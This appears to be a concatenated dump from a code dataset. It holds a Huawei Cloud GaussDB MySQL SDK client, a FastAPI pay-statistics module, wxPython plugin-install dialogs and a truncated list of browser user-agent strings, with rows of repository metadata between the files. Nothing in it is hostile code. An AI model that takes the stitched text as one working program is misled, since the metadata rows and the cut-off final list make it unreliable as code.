return self.show_gauss_my_sql_proxy_with_http_info(request)
def show_gauss_my_sql_proxy_with_http_info(self, request):
"""查询数据库代理信息
查询数据库代理信息。
:param ShowGaussMySqlProxyRequest request
:return: ShowGaussMySqlProxyResponse
"""
all_params = ['instance_id', 'x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'instance_id' in local_var_params:
path_params['instance_id'] = local_var_params['instance_id']
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/instances/{instance_id}/proxy',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ShowGaussMySqlProxyResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def show_gauss_my_sql_proxy_flavors_async(self, request):
"""查询数据库代理规格信息
查询数据库代理规格信息。
:param ShowGaussMySqlProxyFlavorsRequest request
:return: ShowGaussMySqlProxyFlavorsResponse
"""
return self.show_gauss_my_sql_proxy_flavors_with_http_info(request)
def show_gauss_my_sql_proxy_flavors_with_http_info(self, request):
"""查询数据库代理规格信息
查询数据库代理规格信息。
:param ShowGaussMySqlProxyFlavorsRequest request
:return: ShowGaussMySqlProxyFlavorsResponse
"""
all_params = ['instance_id', 'x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'instance_id' in local_var_params:
path_params['instance_id'] = local_var_params['instance_id']
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/instances/{instance_id}/proxy/flavors',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ShowGaussMySqlProxyFlavorsResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def show_gauss_my_sql_quotas_async(self, request):
"""查询租户基于企业项目的资源配额
获取指定企业项目的资源配额。
:param ShowGaussMySqlQuotasRequest request
:return: ShowGaussMySqlQuotasResponse
"""
return self.show_gauss_my_sql_quotas_with_http_info(request)
def show_gauss_my_sql_quotas_with_http_info(self, request):
"""查询租户基于企业项目的资源配额
获取指定企业项目的资源配额。
:param ShowGaussMySqlQuotasRequest request
:return: ShowGaussMySqlQuotasResponse
"""
all_params = ['x_language', 'offset', 'limit', 'enterprise_project_name']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
query_params = []
if 'offset' in local_var_params:
query_params.append(('offset', local_var_params['offset']))
if 'limit' in local_var_params:
query_params.append(('limit', local_var_params['limit']))
if 'enterprise_project_name' in local_var_params:
query_params.append(('enterprise_project_name', local_var_params['enterprise_project_name']))
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/quotas',
method='GET',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='ShowGaussMySqlQuotasResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def update_gauss_my_sql_backup_policy_async(self, request):
"""修改备份策略
修改备份策略
:param UpdateGaussMySqlBackupPolicyRequest request
:return: UpdateGaussMySqlBackupPolicyResponse
"""
return self.update_gauss_my_sql_backup_policy_with_http_info(request)
def update_gauss_my_sql_backup_policy_with_http_info(self, request):
"""修改备份策略
修改备份策略
:param UpdateGaussMySqlBackupPolicyRequest request
:return: UpdateGaussMySqlBackupPolicyResponse
"""
all_params = ['instance_id', 'mysql_update_backup_policy_request', 'x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'instance_id' in local_var_params:
path_params['instance_id'] = local_var_params['instance_id']
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json;charset=UTF-8'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/instances/{instance_id}/backups/policy/update',
method='PUT',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='UpdateGaussMySqlBackupPolicyResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def update_gauss_my_sql_instance_name_async(self, request):
"""修改实例名称
修改实例名称
:param UpdateGaussMySqlInstanceNameRequest request
:return: UpdateGaussMySqlInstanceNameResponse
"""
return self.update_gauss_my_sql_instance_name_with_http_info(request)
def update_gauss_my_sql_instance_name_with_http_info(self, request):
"""修改实例名称
修改实例名称
:param UpdateGaussMySqlInstanceNameRequest request
:return: UpdateGaussMySqlInstanceNameResponse
"""
all_params = ['instance_id', 'mysql_update_instance_name_request', 'x_language']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
if 'instance_id' in local_var_params:
path_params['instance_id'] = local_var_params['instance_id']
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json;charset=UTF-8'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/instances/{instance_id}/name',
method='PUT',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='UpdateGaussMySqlInstanceNameResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def update_gauss_my_sql_quotas_async(self, request):
"""修改租户基于企业项目的资源配额
修改指定企业项目的资源配额。
:param UpdateGaussMySqlQuotasRequest request
:return: UpdateGaussMySqlQuotasResponse
"""
return self.update_gauss_my_sql_quotas_with_http_info(request)
def update_gauss_my_sql_quotas_with_http_info(self, request):
"""修改租户基于企业项目的资源配额
修改指定企业项目的资源配额。
:param UpdateGaussMySqlQuotasRequest request
:return: UpdateGaussMySqlQuotasResponse
"""
all_params = ['x_language', 'set_quotas_request']
local_var_params = {}
for attr in request.attribute_map:
if hasattr(request, attr):
local_var_params[attr] = getattr(request, attr)
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
if 'x_language' in local_var_params:
header_params['X-Language'] = local_var_params['x_language']
form_params = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
if isinstance(request, SdkStreamRequest):
body_params = request.get_file_stream()
response_headers = []
header_params['Content-Type'] = http_utils.select_header_content_type(
['application/json;charset=UTF-8'])
auth_settings = []
return self.call_api(
resource_path='/v3/{project_id}/quotas',
method='PUT',
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body_params,
post_params=form_params,
response_type='UpdateGaussMySqlQuotasResponse',
response_headers=response_headers,
auth_settings=auth_settings,
collection_formats=collection_formats,
request_type=request.__class__.__name__)
def call_api(self, resource_path, method, path_params=None, query_params=None, header_params=None, body=None,
post_params=None, response_type=None, response_headers=None, auth_settings=None,
collection_formats=None, request_type=None):
"""Makes the HTTP request and returns deserialized data.
:param resource_path: Path to method endpoint.
:param method: Method to call.
:param path_params: Path parameters in the url.
:param query_params: Query parameters in the url.
:param header_params: Header parameters to be
placed in the request header.
:param body: Request body.
:param post_params dict: Request post form parameters,
for `application/x-www-form-urlencoded`, `multipart/form-data`.
:param auth_settings list: Auth Settings names for the request.
:param response_type: Response data type.
:param response_headers: Header should be added to response data.
:param collection_formats: dict of collection formats for path, query,
header, and post parameters.
:param request_type: Request data type.
:return:
Return the response directly.
"""
return self.do_http_request(
method=method,
resource_path=resource_path,
path_params=path_params,
query_params=query_params,
header_params=header_params,
body=body,
post_params=post_params,
response_type=response_type,
response_headers=response_headers,
collection_formats=collection_formats,
request_type=request_type,
async_request=True)
| 32.449173
| 123
| 0.639749
| 6,980
| 68,630
| 5.861748
| 0.045845
| 0.050446
| 0.088281
| 0.038714
| 0.900159
| 0.894855
| 0.88283
| 0.87039
| 0.848809
| 0.689112
| 0
| 0.000904
| 0.27472
| 68,630
| 2,114
| 124
| 32.464522
| 0.821078
| 0.118024
| 0
| 0.811489
| 0
| 0
| 0.122839
| 0.053223
| 0
| 0
| 0
| 0
| 0
| 1
| 0.050971
| false
| 0.004854
| 0.008091
| 0
| 0.11246
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
68e4b16cf981c5743597b403dde38311368a0aea
| 750
|
py
|
Python
|
app/api/paystats.py
|
Saigesp/fastapi-test
|
6bfea3c34f49e3a87f1a8fb58071dbded6ccf376
|
[
"BSD-3-Clause"
] | null | null | null |
app/api/paystats.py
|
Saigesp/fastapi-test
|
6bfea3c34f49e3a87f1a8fb58071dbded6ccf376
|
[
"BSD-3-Clause"
] | null | null | null |
app/api/paystats.py
|
Saigesp/fastapi-test
|
6bfea3c34f49e3a87f1a8fb58071dbded6ccf376
|
[
"BSD-3-Clause"
] | null | null | null |
from app.services.validation import validate_postal_code_id
from app.selectors.paystats import (
get_paystats_by_age_gender_from_postal_code_id,
get_paystats_by_time_gender_from_postal_code_id,
)
async def get_paystats_by_age_gender(postal_code_id: int):
validate_postal_code_id(postal_code_id)
data = await get_paystats_by_age_gender_from_postal_code_id(postal_code_id)
return {
"postal_code_id": postal_code_id,
"results": data,
}
async def get_paystats_by_time_gender(postal_code_id: int):
validate_postal_code_id(postal_code_id)
data = await get_paystats_by_time_gender_from_postal_code_id(postal_code_id)
return {
"postal_code_id": postal_code_id,
"results": data,
}
| 28.846154
| 80
| 0.777333
| 114
| 750
| 4.508772
| 0.201754
| 0.330739
| 0.396887
| 0.210117
| 0.842412
| 0.747082
| 0.747082
| 0.747082
| 0.747082
| 0.583658
| 0
| 0
| 0.161333
| 750
| 25
| 81
| 30
| 0.81717
| 0
| 0
| 0.421053
| 0
| 0
| 0.056
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.105263
| 0
| 0.210526
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6b59d740828fedae0fbca60cd3433629e2564ac1
| 10,203
|
py
|
Python
|
views/fetchplugin_dialog.py
|
endymecy/NDIToolbox
|
f7a0a642b4a778d9d0c131871f4bfb9822ecb3da
|
[
"BSD-4-Clause"
] | 5
|
2017-02-28T16:16:06.000Z
|
2020-07-13T06:49:34.000Z
|
views/fetchplugin_dialog.py
|
endymecy/NDIToolbox
|
f7a0a642b4a778d9d0c131871f4bfb9822ecb3da
|
[
"BSD-4-Clause"
] | 1
|
2018-08-19T19:08:14.000Z
|
2018-08-19T19:08:14.000Z
|
views/fetchplugin_dialog.py
|
endymecy/NDIToolbox
|
f7a0a642b4a778d9d0c131871f4bfb9822ecb3da
|
[
"BSD-4-Clause"
] | 4
|
2017-10-25T20:17:15.000Z
|
2021-07-26T11:39:50.000Z
|
"""fetchplugin_idalog.py - dialog to configure remote fetch and inspection
of NDIToolbox plugins
Chris R. Coughlin (TRI/Austin, Inc.)
"""
__author__ = 'Chris R. Coughlin'
from views import ui_defaults
from controllers import fetchplugin_dialog_ctrl
import wx
class FetchPluginDialog(wx.Dialog):
"""Dialog to configure local fetch and inspection
of plugins"""
def __init__(self, parent, plugin_path=None, plugin_type="Plugin"):
self.plugin_type = plugin_type
super(FetchPluginDialog, self).__init__(parent=parent, title="Install {0}".format(
self.plugin_type))
self.plugin_path = plugin_path
self.init_controller()
self.init_ui()
def init_controller(self):
"""Creates the view's controller"""
self.controller = fetchplugin_dialog_ctrl.FetchPluginDialogController(self)
def init_ui(self):
"""Creates and lays out the UI"""
self.main_panel_sizer = wx.FlexGridSizer(cols=2)
loc_lbl = wx.StaticText(self, wx.ID_ANY, u"{0} Location".format(self.plugin_type),
wx.DefaultPosition, wx.DefaultSize)
self.main_panel_sizer.Add(loc_lbl, ui_defaults.lbl_pct, ui_defaults.lblsizer_flags,
ui_defaults.widget_margin)
self.url_tc = wx.TextCtrl(self, wx.ID_ANY, self.plugin_path,
wx.DefaultPosition,
wx.DefaultSize)
self.url_tc.SetToolTipString("Full path and filename of archive")
self.main_panel_sizer.Add(self.url_tc, ui_defaults.ctrl_pct, ui_defaults.sizer_flags,
ui_defaults.widget_margin)
# Set password on encrypted archives
self.encryptedzip_cb = wx.CheckBox(self, wx.ID_ANY, u"Protected")
self.encryptedzip_cb.SetToolTipString("Enable if the archive is encrypted")
self.main_panel_sizer.Add(self.encryptedzip_cb, ui_defaults.ctrl_pct,
ui_defaults.sizer_flags,
ui_defaults.widget_margin)
zip_panel = wx.Panel(self)
zip_panel_sizer = wx.BoxSizer(wx.HORIZONTAL)
zippword_lbl = wx.StaticText(zip_panel, wx.ID_ANY, u"Password",
wx.DefaultPosition, wx.DefaultSize)
zip_panel_sizer.Add(zippword_lbl, ui_defaults.lbl_pct, ui_defaults.lblsizer_flags,
ui_defaults.widget_margin)
self.zippword_tc = wx.TextCtrl(zip_panel, wx.ID_ANY, u'', wx.DefaultPosition,
wx.DefaultSize, style=wx.TE_PASSWORD)
zip_panel_sizer.Add(self.zippword_tc, ui_defaults.ctrl_pct, ui_defaults.sizer_flags,
ui_defaults.widget_margin)
zip_panel.SetSizerAndFit(zip_panel_sizer)
self.main_panel_sizer.Add(zip_panel, ui_defaults.ctrl_pct, ui_defaults.sizer_flags,
0)
self.about_plugin_btn = wx.Button(self, wx.ID_ANY, "About {0}...".format(self.plugin_type),
wx.DefaultPosition, wx.DefaultSize)
self.about_plugin_btn.SetToolTipString("Displays the archive's README file")
self.Bind(wx.EVT_BUTTON, self.controller.on_about_plugin, self.about_plugin_btn)
self.main_panel_sizer.Add(self.about_plugin_btn, ui_defaults.ctrl_pct,
ui_defaults.sizer_flags,
0)
self._generate_std_buttons()
self.SetSizerAndFit(self.main_panel_sizer)
def _generate_std_buttons(self):
"""Generates the standard OK/Cancel dialog buttons"""
self.stdbtns = wx.StdDialogButtonSizer()
ok_btn = wx.Button(self, wx.ID_OK)
cancel_btn = wx.Button(self, wx.ID_CANCEL)
self.stdbtns.AddButton(ok_btn)
self.stdbtns.AddButton(cancel_btn)
self.stdbtns.Realize()
self.main_panel_sizer.Add(self.stdbtns, ui_defaults.lbl_pct, ui_defaults.sizer_flags,
0)
def install_plugin(self):
"""Attempts to download, verify, and install the plugin archive"""
self.controller.install_plugin()
class FetchRemotePluginDialog(wx.Dialog):
"""Dialog to configure remote fetch and inspection
of NDIToolbox Plugins"""
def __init__(self, parent, plugin_type="Plugin"):
self.plugin_type = plugin_type
super(FetchRemotePluginDialog, self).__init__(parent=parent,
title="Install {0}".format(self.plugin_type))
self.init_controller()
self.init_ui()
def init_controller(self):
"""Creates the view's controller"""
self.controller = fetchplugin_dialog_ctrl.FetchRemotePluginDialogController(self)
def install_plugin(self):
"""Attempts to download, verify, and install the plugin archive"""
self.controller.install_plugin()
def init_ui(self):
"""Creates and lays out the UI"""
self.main_panel_sizer = wx.FlexGridSizer(cols=2)
url_lbl = wx.StaticText(self, wx.ID_ANY, u"{0} URL".format(self.plugin_type),
wx.DefaultPosition, wx.DefaultSize)
self.main_panel_sizer.Add(url_lbl, ui_defaults.lbl_pct, ui_defaults.lblsizer_flags,
ui_defaults.widget_margin)
self.url_tc = wx.TextCtrl(self, wx.ID_ANY, u'http://',
wx.DefaultPosition,
wx.DefaultSize)
self.url_tc.SetToolTipString("Example: http://www.tri-austin.com/nditoolbox/my_plugin.zip")
self.main_panel_sizer.Add(self.url_tc, ui_defaults.ctrl_pct, ui_defaults.sizer_flags,
ui_defaults.widget_margin)
# Set username/password if necessary
self.login_cb = wx.CheckBox(self, wx.ID_ANY, u"Login Required")
self.login_cb.SetToolTipString("Enable if the URL requires a username and password")
self.main_panel_sizer.Add(self.login_cb, ui_defaults.ctrl_pct, ui_defaults.sizer_flags,
ui_defaults.widget_margin)
login_panel = wx.Panel(self)
login_panel_sizer = wx.BoxSizer(wx.HORIZONTAL)
uname_lbl = wx.StaticText(login_panel, wx.ID_ANY, u"Username",
wx.DefaultPosition, wx.DefaultSize)
login_panel_sizer.Add(uname_lbl, ui_defaults.lbl_pct, ui_defaults.lblsizer_flags,
ui_defaults.widget_margin)
self.uname_tc = wx.TextCtrl(login_panel, wx.ID_ANY, u'', wx.DefaultPosition,
wx.DefaultSize)
login_panel_sizer.Add(self.uname_tc, ui_defaults.ctrl_pct, ui_defaults.sizer_flags,
ui_defaults.widget_margin)
pword_lbl = wx.StaticText(login_panel, wx.ID_ANY, u"Password",
wx.DefaultPosition, wx.DefaultSize)
login_panel_sizer.Add(pword_lbl, ui_defaults.lbl_pct, ui_defaults.lblsizer_flags,
ui_defaults.widget_margin)
self.pword_tc = wx.TextCtrl(login_panel, wx.ID_ANY, u'', wx.DefaultPosition,
wx.DefaultSize, style=wx.TE_PASSWORD)
login_panel_sizer.Add(self.pword_tc, ui_defaults.ctrl_pct, ui_defaults.sizer_flags,
ui_defaults.widget_margin)
login_panel.SetSizerAndFit(login_panel_sizer)
self.main_panel_sizer.Add(login_panel, ui_defaults.ctrl_pct, ui_defaults.sizer_flags,
0)
# Set password on encrypted archives
self.encryptedzip_cb = wx.CheckBox(self, wx.ID_ANY, u"Protected")
self.encryptedzip_cb.SetToolTipString("Enable if the archive is encrypted")
self.main_panel_sizer.Add(self.encryptedzip_cb, ui_defaults.ctrl_pct,
ui_defaults.sizer_flags,
ui_defaults.widget_margin)
zip_panel = wx.Panel(self)
zip_panel_sizer = wx.BoxSizer(wx.HORIZONTAL)
zippword_lbl = wx.StaticText(zip_panel, wx.ID_ANY, u"Password",
wx.DefaultPosition, wx.DefaultSize)
zip_panel_sizer.Add(zippword_lbl, ui_defaults.lbl_pct, ui_defaults.lblsizer_flags,
ui_defaults.widget_margin)
self.zippword_tc = wx.TextCtrl(zip_panel, wx.ID_ANY, u'', wx.DefaultPosition,
wx.DefaultSize, style=wx.TE_PASSWORD)
zip_panel_sizer.Add(self.zippword_tc, ui_defaults.ctrl_pct, ui_defaults.sizer_flags,
ui_defaults.widget_margin)
zip_panel.SetSizerAndFit(zip_panel_sizer)
self.main_panel_sizer.Add(zip_panel, ui_defaults.ctrl_pct, ui_defaults.sizer_flags,
0)
self.about_plugin_btn = wx.Button(self, wx.ID_ANY, "About {0}...".format(self.plugin_type),
wx.DefaultPosition, wx.DefaultSize)
self.about_plugin_btn.SetToolTipString("Displays the archive's README file")
self.Bind(wx.EVT_BUTTON, self.controller.on_about_plugin, self.about_plugin_btn)
self.main_panel_sizer.Add(self.about_plugin_btn, ui_defaults.ctrl_pct,
ui_defaults.sizer_flags,
0)
self._generate_std_buttons()
self.SetSizerAndFit(self.main_panel_sizer)
def _generate_std_buttons(self):
"""Generates the standard OK/Cancel dialog buttons"""
self.stdbtns = wx.StdDialogButtonSizer()
ok_btn = wx.Button(self, wx.ID_OK)
cancel_btn = wx.Button(self, wx.ID_CANCEL)
self.stdbtns.AddButton(ok_btn)
self.stdbtns.AddButton(cancel_btn)
self.stdbtns.Realize()
self.main_panel_sizer.Add(self.stdbtns, ui_defaults.lbl_pct, ui_defaults.sizer_flags,
0)
| 53.984127
| 100
| 0.616289
| 1,198
| 10,203
| 4.950751
| 0.113523
| 0.101163
| 0.048221
| 0.054628
| 0.890575
| 0.875569
| 0.858034
| 0.852807
| 0.816051
| 0.782499
| 0
| 0.002092
| 0.297364
| 10,203
| 189
| 101
| 53.984127
| 0.82522
| 0.068509
| 0
| 0.743243
| 0
| 0
| 0.047892
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.067568
| false
| 0.047297
| 0.02027
| 0
| 0.101351
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6b854f8a7254b12d22c3c71a84de744156f484c2
| 33,394
|
py
|
Python
|
user_agents.py
|
p1ay8y3ar/Bauman-Mytishchi-Campus-Wifi-Tool
|
8208be5f11a1437c9d806930886e4cb6c4ae4510
|
[
"MIT"
] | null | null | null |
user_agents.py
|
p1ay8y3ar/Bauman-Mytishchi-Campus-Wifi-Tool
|
8208be5f11a1437c9d806930886e4cb6c4ae4510
|
[
"MIT"
] | null | null | null |
user_agents.py
|
p1ay8y3ar/Bauman-Mytishchi-Campus-Wifi-Tool
|
8208be5f11a1437c9d806930886e4cb6c4ae4510
|
[
"MIT"
] | null | null | null |
# try:
# from fake_useragent import UserAgent
#
# ua =UserAgent(verify_ssl=False,use_cache_server=False,cache=False) #禁用ssl
# print(ua.chrome)
#
# except Exception as e:
# print(e)
#
#
# re=[]
#
# count =0
#
# while count!=300:
# re.append(ua.random)
# count+=1
#
# print(re)
user_agents=['Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36 Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36', 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.62 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202 Firefox/26.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17', 'Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:21.0.0) Gecko/20121011 Firefox/21.0.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3', 'Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36', 'Mozilla/5.0 (X11; CrOS i686 4319.74.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36', 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; InfoPath.1; SV1; .NET CLR 3.8.36217; WOW64; en-US)', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.66.18) Gecko/20177177 Firefox/45.66.18', 'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.517 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1623.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; ja-JP) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F', 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36', 'Mozilla/5.0 (X11; CrOS i686 4319.74.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 